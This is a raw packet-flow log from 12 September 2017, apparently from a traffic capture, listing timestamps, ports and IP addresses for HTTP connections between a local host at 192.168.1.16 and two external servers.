Sep 12, 2017 22:18:57.877926111 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.879692078 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.879717112 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.879821062 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.879843950 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.917762041 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.917840004 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.917860985 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.918282986 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.918301105 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.918391943 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.919034004 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.920255899 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.920270920 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.920278072 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.920370102 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.943512917 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.943784952 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.943933964 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.943954945 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.943968058 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.944174051 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.957819939 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.957850933 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.957859993 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.958161116 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.982553959 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.982580900 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.982590914 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:57.982620955 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.982975960 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:57.983387947 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.983417988 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:57.983570099 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:57.983593941 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.031570911 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.031589985 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.031744957 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.031773090 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.067996025 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.068022013 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.068109035 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.068133116 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.068161964 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.068185091 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.068207979 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.068607092 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.068629026 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.068654060 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.069253922 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.069467068 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.072606087 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.072628975 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.072640896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.072958946 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.087214947 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.087384939 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.104458094 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.104492903 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.104509115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.104657888 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.109550953 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.109576941 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.109582901 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.109709978 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.126971960 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.127007008 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.127015114 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.127057076 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.127166033 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.127199888 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.142338991 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.142355919 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.142371893 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.142664909 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.150623083 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.150768042 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.150994062 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.151012897 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.151025057 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.151128054 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.181370020 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.181385994 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.181404114 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.181555986 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.198990107 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.199031115 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.199043989 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.199172020 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.200156927 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.200196981 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.200210094 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.200301886 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.200326920 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.226013899 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.226038933 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.226167917 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.226193905 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.231940031 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.231962919 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.232095003 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.232119083 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.232331991 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.232342958 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.232359886 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.232542038 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.232563972 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.232592106 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.261584044 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.261805058 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.272501945 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.272521019 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.272531033 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.272686005 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.298933029 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.299180984 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.309056997 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.309083939 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.309096098 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.309223890 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.334805012 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.334834099 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.334852934 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.335263968 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.336179972 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.336209059 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.336224079 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.336241007 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.336354971 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.336363077 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.336381912 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.336421967 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.336468935 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.337236881 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.341353893 MESZ	49201	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.341392040 MESZ	80	49201	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.370929956 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.370954990 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.371170998 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.371225119 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.375988007 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.376019955 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.376195908 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.376256943 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.377485037 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.377506971 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.377652884 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.377706051 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.414834023 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.414865017 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.414875984 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.415072918 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.415122032 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.432101011 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.432382107 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.437992096 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.438025951 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.438035965 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.438354015 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.446744919 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.446784973 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.446799040 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.446963072 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.460675001 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.463762045 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.463799000 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.463812113 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.463912010 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.477325916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.477355003 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.477369070 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.477587938 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.508963108 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.519995928 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.520031929 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.520319939 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.520376921 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.543714046 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.543754101 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.543899059 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.543917894 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.543936968 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.544037104 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.544105053 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.545802116 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.557729006 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.583085060 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.583121061 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.583265066 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.583295107 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.605772018 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.608692884 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.616261959 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.616302967 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.616321087 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.616417885 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.648399115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.648453951 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.648479939 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.648586035 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.648605108 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.648976088 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.649008989 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.649528980 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.653170109 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.653553009 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.656188965 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.656225920 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.656239986 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.656637907 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.720455885 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.720511913 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.720735073 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.720761061 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.751451015 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.751486063 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.751791000 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.751820087 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.751826048 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.751876116 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.751908064 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.752454996 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.757134914 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.759665012 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.759712934 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.759905100 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.797573090 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.797702074 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.799897909 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.799918890 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.799928904 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.800343990 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.837213993 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.837282896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.837291002 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.837522984 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.839272022 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.839288950 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.839294910 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.839474916 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.877579927 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.877625942 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.877648115 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.877846003 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.914402008 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.914633036 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.917880058 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.917913914 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.917928934 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.918138981 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.967900991 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:58.967952967 MESZ	80	49199	91.219.236.207	192.168.1.16
Sep 12, 2017 22:18:58.977854967 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.977881908 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.977891922 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.977978945 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.978215933 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.978235006 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.978254080 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.978322983 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.978456020 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.978471994 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.978482962 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.980519056 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:58.998657942 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:58.998784065 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.007692099 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.007728100 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.007745981 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.007818937 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.008506060 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.011773109 MESZ	49199	80	192.168.1.16	91.219.236.207
Sep 12, 2017 22:18:59.013052940 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.013088942 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.013098001 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.013178110 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.045805931 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.045840025 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.045855045 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.045963049 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.046828985 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.046849966 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.046861887 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.047122955 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.078437090 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.078602076 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.079242945 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.079278946 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.079298019 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.079643965 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.086072922 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.086103916 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.086117983 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.086219072 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.086236000 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.086260080 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.086296082 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.086783886 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.117111921 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.117322922 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.125591040 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.125626087 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.125643015 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.125818968 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.145052910 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.145195961 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.157095909 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.157119989 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.157136917 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.157388926 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.184103966 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.184139013 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.184148073 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.184247017 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.185386896 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.185419083 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.185436010 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.185599089 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.185774088 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.185792923 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.185807943 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.186043024 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.197216988 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.197567940 MESZ	49202	80	192.168.1.16	88.221.14.177
Sep 12, 2017 22:18:59.224519014 MESZ	80	49202	88.221.14.177	192.168.1.16
Sep 12, 2017 22:18:59.224545002 MESZ	80	49202	88.221.14.177	192.168.1.16
